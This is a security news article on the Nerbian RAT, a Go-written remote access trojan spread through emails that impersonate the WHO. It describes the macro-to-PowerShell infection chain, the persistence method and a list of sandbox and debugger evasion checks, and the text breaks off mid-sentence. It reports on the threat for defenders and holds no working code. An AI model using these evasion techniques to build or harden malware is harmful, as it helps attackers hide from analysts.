A new remote access trojan called Nerbian RAT has been discovered that includes a rich set of features, including the ability to evade detection and analysis by researchers.
The new malware variant is written in Go, making it a cross-platform 64-bit threat, and it’s currently distributed via a small-scale email distribution campaign that uses document attachments laced with macros.
The email campaigns were discovered by researchers at Proofpoint, who released a report today on the new Nerbian RAT malware.
Impersonating the WHO
The malware campaign distributing Nerbian RAT impersonates the World Health Organization (WHO), which is allegedly sending COVID-19 information to the targets.
The RAR attachments contain Word documents laced with malicious macro code, so if opened on Microsoft Office with content set to “enabled,” a bat file performs a PowerShell execution step to download a 64-bit dropper.
The dropper, named “UpdateUAV.exe,” is also written in Golang and is packed in UPX to keep the size manageable.
UpdateUAV reuses code from various GitHub projects to incorporate a rich set of anti-analysis and detection-evasion mechanisms before Nerbian RAT is deployed.
Apart from that, the dropper also establishes persistence by creating a scheduled task that launches that RAT every hour.
Proofpoint summarizes the list of anti-analysis tools as follows:
- Check for the existence of reverse engineering or debugging programs in the process list
- Check for suspicious MAC addresses
- Check the WMI strings to see if disk names are legitimate
- Check if the hard disk size is below 100GB, which is typical for virtual machines
- Check if there are any memory analysis or tampering detection programs present in the process list
- Check the amount of time elapsed since execution and compare it with a set threshold
- Use the IsDebuggerPresent API to determine if the executable is being debugged
All these checks make it practically impossible to get the RAT running in a sandboxed, virtualized environment, ensuring long-term stealthiness for the malware operators.
Nerbian RAT features
The trojan is downloaded as “MoUsoCore.exe” and is saved to…